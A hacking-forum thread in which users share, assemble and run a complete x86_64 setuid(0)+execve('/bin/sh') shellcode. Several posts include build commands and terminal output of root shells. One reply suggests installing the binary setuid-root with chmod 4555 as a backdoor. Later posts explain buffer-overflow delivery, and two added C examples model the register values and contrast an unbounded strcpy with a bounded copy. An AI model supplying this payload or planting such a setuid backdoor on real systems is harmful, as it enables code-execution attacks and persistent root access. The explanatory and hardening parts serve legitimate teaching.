Nytro Posted July 21, 2013

setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

    # Redistribution and use in source and binary forms, with or without
    # modification, are permitted provided that the following conditions are met:
    #
    # * Redistributions of source code must retain the above copyright notice, this
    #   list of conditions and the following disclaimer.
    # * Redistributions in binary form must reproduce the above copyright notice,
    #   this list of conditions and the following disclaimer in the documentation
    #   and/or other materials provided with the distribution.
    # * Neither the name of the Nth Dimension nor the names of its contributors may
    #   be used to endorse or promote products derived from this software without
    #   specific prior written permission.
    #
    # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
    # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
    # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
    # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
    # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
    # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
    # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
    # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
    # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
    # POSSIBILITY OF SUCH DAMAGE.
    #
    # (c) Tim Brown, 2009
    # <mailto:timb@nth-dimension.org.uk>
    # <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
    #
    # setuid(0) + execve("/bin/sh") on x86_64 GNU/Linux

    .text
    .globl _start

    _start:
        # uid = 0
        xor %edi, %edi                          # set %edi to 0 (first argument of setuid)

        # setuid
        mov $0x69, %al                          # set %al to 0x69 (105, setuid)
        syscall                                 # enter the kernel

        # *filename = "/bin//sh"
        xor %ax, %ax                            # set %ax to 0
        push %ax                                # push %ax on to the stack (NUL terminator)
        movq $0x68732f2f6e69622f, %rbx          # set %rbx to "hs//nib/" (little-endian "/bin//sh")
        pushq %rbx                              # push %rbx on to the stack
        movq %rsp, %rdi                         # set %rdi to %rsp (pointer to the string)

        # **argv = [0, *filename]
        xorq %rcx, %rcx                         # set %rcx to 0
        pushq %rcx                              # push %rcx on to the stack (argv terminator)
        pushq %rdi                              # push %rdi on to the stack (argv[0])
        movq %rsp, %rsi                         # set %rsi to %rsp (pointer to argv)

        # execve
        mov $0x3b, %al                          # set %al to 0x3b (59, execve)
        syscall                                 # enter the kernel

I posted it because it is explained.

Source: http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm
u0m3 Posted July 22, 2013

And how is it used or compiled?

    gcc setuid_execve_x86_64_Linux.asm -o shell

If that doesn't work, change the source file's extension from .asm to .s
florinul Posted July 23, 2013

    [root@#KaNaDa-TeaM BackDoor:/root]# gcc a.s -o shel
    /tmp/ccuIeglI.o: In function `_start':
    (.text+0x0): multiple definition of `_start'
    /usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o:(.text+0x0): first defined here
    /usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o: In function `_start':
    (.text+0x20): undefined reference to `main'
    collect2: ld returned 1 exit status
    [root@#KaNaDa-TeaM BackDoor:/root]# gcc a.s -o shell
    /tmp/cchulhnB.o: In function `_start':
    (.text+0x0): multiple definition of `_start'
    /usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o:(.text+0x0): first defined here
    /usr/lib/gcc/x86_64-redhat-linux/4.4.6/../../../../lib64/crt1.o: In function `_start':
    (.text+0x20): undefined reference to `main'
    collect2: ld returned 1 exit status
kNigHt Posted July 23, 2013

It won't compile no matter what I do, damn it. Has anyone managed?

EDIT: I managed, maybe it helps someone...

    [root@x] ~/test2 $ wget http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm
    [ bla bla ]
    [root@x] ~/test2 $ ls
    setuid_execve_x86_64_Linux.asm
    [root@x] ~/test2 $ mv setuid_execve_x86_64_Linux.asm setuid_execve_x86_64_Linux.s
    [root@x] ~/test2 $ gcc setuid_execve_x86_64_Linux.s -c -o setuid_execve_x86_64_Linux
    [root@x] ~/test2 $ ld setuid_execve_x86_64_Linux -o setuid_execve_x86_64_Linux_compiled
    [root@x] ~/test2 $ chmod +x setuid_execve_x86_64_Linux_compiled
    [root@x] ~/test2 $ ./setuid_execve_x86_64_Linux_compiled
    # whoami
    root
    #
    #
    # whatido
    /bin//sh: 4: whatido: not found
    #
    #
    # id
    uid=0(root) gid=0(root) groups=0(root)
    #
    #

Edited July 23, 2013 by kNigHt
Zatarra Posted July 23, 2013

@knight - I hope you didn't run it as root
Nytro (author) Posted July 24, 2013

> @knight - I hope you didn't run it as root

It's fine, I read it before posting, that's why I posted it.

There are 2 syscalls:
- setuid
- execve

They match the ones here: Ryan A. Chapman | Linux System Call Table for x86_64

And that "line" is "hs//nib/" => /bin/sh
Zatarra Posted July 24, 2013

> It's fine, I read it before posting, that's why I posted it.
>
> There are 2 syscalls:
> - setuid
> - execve
>
> They match the ones here: Ryan A. Chapman | Linux System Call Table for x86_64
>
> And that "line" is "hs//nib/" => /bin/sh

I wasn't saying it has something bad in it, I meant that if you already run it as uid 0, what's the point?
bcman Posted July 24, 2013

I did exactly the same thing as knight and I get the following errors when compiling:

    setuid_execve_x86_64_Linux.s: Assembler messages:
    setuid_execve_x86_64_Linux.s:42: Error: bad register name `%rbx'
    setuid_execve_x86_64_Linux.s:43: Error: bad register name `%rbx'
    setuid_execve_x86_64_Linux.s:44: Error: bad register name `%rsp'
    setuid_execve_x86_64_Linux.s:46: Error: bad register name `%rcx'
    setuid_execve_x86_64_Linux.s:47: Error: bad register name `%rcx'
    setuid_execve_x86_64_Linux.s:48: Error: bad register name `%rdi'
    setuid_execve_x86_64_Linux.s:49: Error: bad register name `%rsp'

I figure it's something on my end, since it worked for you. Any ideas?
Zatarra Posted July 24, 2013

> I did exactly the same thing as knight and I get the following errors when compiling:
> I figure it's something on my end, since it worked for you. Any ideas?

Is the server x86_64? Run uname -i
bcman Posted July 24, 2013

> Is the server x86_64? Run uname -i

Oops, my bad. I wasn't paying attention, I tested it on an i386. I just tried it on an x86_64 too and it works. Thanks!

Regarding your post addressed to knight, as far as I can see he didn't run it as root, he only became root after running it.
Zatarra Posted July 24, 2013

> Oops, my bad. I wasn't paying attention, I tested it on an i386. I just tried it on an x86_64 too and it works. Thanks!
>
> Regarding your post addressed to knight, as far as I can see he didn't run it as root, he only became root after running it.

I know that $ is part of a (non-root) user's prompt, but it depends on the distribution, I was just curious. Honestly I still haven't tested it; I'm curious which kernel versions it works on and when it was fixed.
florinul Posted July 24, 2013

Nytro, tell us how it's used, because I haven't managed to compile it on any of them; maybe I'm making a mistake somewhere.
kNigHt Posted July 24, 2013

@Zatarra There's no point in running it as root, I just wanted to see whether it compiled correctly. In any case, privilege escalation didn't work for me with it.
florinul Posted July 26, 2013

Knight, you were already root:

    [root@x] ~/test2 $ ./setuid_execve_x86_64_Linux_compiled
    # whoami
    root
shaggi Posted July 26, 2013

    shaggi@gmail:~$ gcc cacat.s -c -o cacat
    shaggi@gmail:~$ ./cacat
    -bash: ./cacat: Permission denied
    shaggi@gmail:~$ chmod +x ./cacat
    shaggi@gmail:~$ ./cacat
    -bash: ./cacat: cannot execute binary file
    shaggi@gmail:~$

what the crap?
Nytro (author) Posted July 26, 2013

    [root@rstforums ~]# as test.asm -o object.o
    [root@rstforums ~]# ld object.o -o shell
    [root@rstforums ~]# ./shell
    sh-3.2#

It's not a privilege escalation exploit, it's just a shellcode that opens a shell.

1. setuid: http://linux.die.net/man/2/setuid
2. execve: /bin/sh

Edited July 26, 2013 by Nytro
shaggi Posted July 26, 2013

it's pointless, it only works when run as root...

    shaggi@gmail:~$ sudo ./shell
    # exit
    shaggi@gmail:~$ ./shell
    Segmentation fault
    shaggi@gmail:~$ uname -r -i
    2.6.32-042stab078.28 x86_64
    shaggi@gmail:~$

LE (later edit): it's good as a backdoor with chmod 4555, i.e. -r-sr-xr-x

Edited July 26, 2013 by shaggi
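Added example, written for this thread and not part of Tim Brown's shellcode or of any post above: a small C model of the values the posted code leaves in %rax and on the stack. It covers two points raised in the thread, Nytro's remark that the immediate "hs//nib/" spells /bin/sh, and shaggi's observation that the binary segfaults unless it is started with uid 0. The syscall numbers are the ones in the posted source (0x69 = setuid, 0x3b = execve); the -EPERM return value for an unprivileged setuid(0) is from the setuid(2) man page Nytro linked; the 512 upper bound on the syscall table is an assumed round figure; and the explanation of the crash is my reading of the register arithmetic, not a statement from the thread.

```c
/* Added example: C model of the register and stack values in the posted
 * x86_64 setuid+execve shellcode.  Not the shellcode itself and not a post
 * from the thread. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SYS_SETUID 0x69ULL   /* 105: "mov $0x69, %al" in the posted source */
#define SYS_EXECVE 0x3bULL   /* 59:  "mov $0x3b, %al" in the posted source */
#define NR_SYSCALLS_BOUND 512ULL  /* assumed: no x86_64 kernel has this many entries */

/* "movq $0x68732f2f6e69622f, %rbx ; pushq %rbx" stores the immediate
 * little-endian, so its lowest byte (0x2f, '/') lands at the lowest address,
 * which is where the string begins.  Reading the hex constant left to right
 * therefore shows the path backwards: "hs//nib/". */
void decode_path_qword(uint64_t imm, char out[9]) {
    for (int i = 0; i < 8; i++)
        out[i] = (char)((imm >> (8 * i)) & 0xff);
    out[8] = '\0';   /* in the shellcode the NUL comes from "push %ax" */
}

/* Inverse direction: pack exactly 8 path characters into the immediate.
 * "/bin/sh" is 7 bytes; the author padded it to "/bin//sh" because the
 * kernel ignores a doubled slash, whereas a 0x00 pad byte would both end
 * the string early and put a NUL into the shellcode. */
uint64_t encode_path_qword(const char *path8) {
    uint64_t imm = 0;
    for (int i = 0; i < 8; i++)
        imm |= (uint64_t)(unsigned char)path8[i] << (8 * i);
    return imm;
}

/* Convenience check: does the immediate spell the expected path? */
int qword_spells(uint64_t imm, const char *expected) {
    char buf[9];
    decode_path_qword(imm, buf);
    return strcmp(buf, expected) == 0;
}

/* The number execve() is invoked with, as a function of what the preceding
 * setuid() left in %rax.  "xor %ax, %ax" clears only bits 0..15 and
 * "mov $0x3b, %al" writes only bits 0..7; bits 16..63 keep whatever
 * setuid() returned. */
uint64_t execve_nr_in_rax(int64_t setuid_ret) {
    uint64_t rax = (uint64_t)setuid_ret;          /* result of the first syscall */
    rax &= ~(uint64_t)0xffff;                     /* xor %ax, %ax */
    rax = (rax & ~(uint64_t)0xff) | SYS_EXECVE;   /* mov $0x3b, %al */
    return rax;
}

/* The kernel compares the number unsigned against its table size; anything
 * out of range returns -ENOSYS, no new program starts, and the CPU keeps
 * executing past the last "syscall" into whatever bytes follow the code,
 * which is the "Segmentation fault" shaggi saw when not root. */
int kernel_accepts_nr(uint64_t nr) {
    return nr < NR_SYSCALLS_BOUND;
}

int main(void) {
    char path[9];
    decode_path_qword(0x68732f2f6e69622fULL, path);
    printf("setuid=%llu execve=%llu\n",
           (unsigned long long)SYS_SETUID, (unsigned long long)SYS_EXECVE);
    printf("immediate spells \"%s\", re-encoded 0x%016llx\n", path,
           (unsigned long long)encode_path_qword("/bin//sh"));

    uint64_t as_root = execve_nr_in_rax(0);       /* setuid(0) succeeded */
    uint64_t as_user = execve_nr_in_rax(-EPERM);  /* setuid(0) refused */
    printf("as root: rax=0x%016llx accepted=%d\n",
           (unsigned long long)as_root, kernel_accepts_nr(as_root));
    printf("as user: rax=0x%016llx accepted=%d\n",
           (unsigned long long)as_user, kernel_accepts_nr(as_user));
    return 0;
}
```

The two paths through execve_nr_in_rax are the whole difference between the root and non-root runs in the thread: with uid 0 the first syscall returns 0 and %rax ends up as exactly 0x3b, without it the -1 left by EPERM survives in the upper 48 bits and the second syscall never reaches execve.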
Nytro (author) Posted July 26, 2013

Of course it's not an EXPLOIT, it's SHELLCODE.

See the tutorials made by neox.

In short:
1. You have a program/server (Apache HTTPD for example) on Linux
2. That program has a static buffer: char buffer[100]
3. When you open a web page: GET /pagina.php HTTP/1.1, this line is put into that buffer
4. If you put more than 100 characters: GET /paginaaaaaaaaaaaaaaaaaaaaaaaaaa...aaaaaaaaaaaaaaa.php, the size of that buffer is exceeded
5. What spills past this buffer, under optimal conditions, can overwrite EIP (the code being executed)
6. By exploiting this problem you get the possibility of running code, like the one above, shellcode, instead of the program's own code
7. The code (above) runs and gives you a shell, so that you, bad guy, can run evil commands

That's just the idea, very briefly.

It does NOT exploit a kernel problem so that you "become root". It just opens a shell.

See this: setuid - Wikipedia, the free encyclopedia
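Added example, not code from the thread or from any project it mentions: the fixed buffer from step 2 of Nytro's summary (char buffer[100]) written once with the unbounded copy that makes steps 4 and 5 possible, and once in the bounded form a server should use. The request-line builder and its "pagin…a….php" inputs are constructed here to mirror steps 3 and 4; nothing in it overwrites anything, the unbounded version is only ever called with a short line.

```c
/* Added example: the char buffer[100] pattern from the post, unbounded
 * versus bounded.  Constructed request lines; not code from the thread. */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 100

/* Steps 2 and 3: a fixed-size stack buffer receives the request line.
 * strcpy() writes strlen(line)+1 bytes regardless of BUF_SIZE, so a line
 * of 100 or more bytes overwrites whatever sits after the array on the
 * stack (steps 4 and 5).  Only ever call this with short input. */
int store_request_unbounded(const char *line) {
    char buffer[BUF_SIZE];
    strcpy(buffer, line);
    return (int)strlen(buffer);
}

/* Hardened form: measure first, refuse over-long lines (a real server
 * answers 414 Request-URI Too Long here), then copy with an explicit length. */
int store_request_bounded(const char *line) {
    char buffer[BUF_SIZE];
    size_t n = strlen(line);
    if (n >= BUF_SIZE)        /* need one byte for the terminating NUL */
        return -1;
    memcpy(buffer, line, n + 1);
    return (int)n;
}

/* Pure size check usable before any copy: does a line of n bytes fit? */
int fits_in_buffer(size_t n) {
    return n + 1 <= BUF_SIZE;
}

/* Build the line from step 4: "GET /pagin" + a_count times 'a' + ".php HTTP/1.1".
 * Returns the total length, or -1 if out is too small to hold it. */
int build_request(char *out, size_t outsz, size_t a_count) {
    const char *head = "GET /pagin";      /* 10 bytes */
    const char *tail = ".php HTTP/1.1";   /* 13 bytes */
    size_t hl = strlen(head), tl = strlen(tail);
    size_t total = hl + a_count + tl;
    if (total + 1 > outsz)
        return -1;
    memcpy(out, head, hl);
    memset(out + hl, 'a', a_count);
    memcpy(out + hl + a_count, tail, tl + 1);
    return (int)total;
}

/* Build a line with a_count 'a's and run it through the bounded copy. */
int bounded_result_for(size_t a_count) {
    char req[1024];
    if (build_request(req, sizeof req, a_count) < 0)
        return -2;
    return store_request_bounded(req);
}

int main(void) {
    char req[1024];
    int len = build_request(req, sizeof req, 1);   /* "GET /pagina.php HTTP/1.1" */
    printf("%d bytes: unbounded -> %d, bounded -> %d\n", len,
           store_request_unbounded(req), store_request_bounded(req));
    len = build_request(req, sizeof req, 200);     /* step 4's long line */
    printf("%d bytes: fits=%d, bounded -> %d (unbounded would smash the stack)\n",
           len, fits_in_buffer((size_t)len), store_request_bounded(req));
    return 0;
}
```

The boundary is at 99 bytes of payload: 76 'a's gives a 99-byte line that the bounded copy accepts, 77 gives 100 bytes and is refused, which is exactly the point at which the unbounded version would start writing past buffer[].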
florinul Posted July 26, 2013

so in the end it's not a local exploit, right?
Nytro (author) Posted July 26, 2013

> Of course it's not an EXPLOIT, it's SHELLCODE.
>
> See the tutorials made by neox.
>
> In short:
> 1. You have a program/server (Apache HTTPD for example) on Linux
> 2. That program has a static buffer: char buffer[100]
> 3. When you open a web page: GET /pagina.php HTTP/1.1, this line is put into that buffer
> 4. If you put more than 100 characters: GET /paginaaaaaaaaaaaaaaaaaaaaaaaaaa...aaaaaaaaaaaaaaa.php, the size of that buffer is exceeded
> 5. What spills past this buffer, under optimal conditions, can overwrite EIP (the code being executed)
> 6. By exploiting this problem you get the possibility of running code, like the one above, shellcode, instead of the program's own code
> 7. The code (above) runs and gives you a shell, so that you, bad guy, can run evil commands
>
> That's just the idea, very briefly.
>
> It does NOT exploit a kernel problem so that you "become root". It just opens a shell.
>
> See this: setuid - Wikipedia, the free encyclopedia

I added colouring.
l3arn3r Posted August 19, 2013

> It won't compile no matter what I do, damn it. Has anyone managed?
>
> EDIT: I managed, maybe it helps someone...
>
>     [root@x] ~/test2 $ wget http://www.nth-dimension.org.uk/pub/setuid_execve_x86_64_Linux.asm
>     [ bla bla ]
>     [root@x] ~/test2 $ ls
>     setuid_execve_x86_64_Linux.asm
>     [root@x] ~/test2 $ mv setuid_execve_x86_64_Linux.asm setuid_execve_x86_64_Linux.s
>     [root@x] ~/test2 $ gcc setuid_execve_x86_64_Linux.s -c -o setuid_execve_x86_64_Linux
>     [root@x] ~/test2 $ ld setuid_execve_x86_64_Linux -o setuid_execve_x86_64_Linux_compiled
>     [root@x] ~/test2 $ chmod +x setuid_execve_x86_64_Linux_compiled
>     [root@x] ~/test2 $ ./setuid_execve_x86_64_Linux_compiled
>     # whoami
>     root
>     #
>     #
>     # whatido
>     /bin//sh: 4: whatido: not found
>     #
>     #
>     # id
>     uid=0(root) gid=0(root) groups=0(root)
>     #
>     #

    # uname -a

Please post the result of this command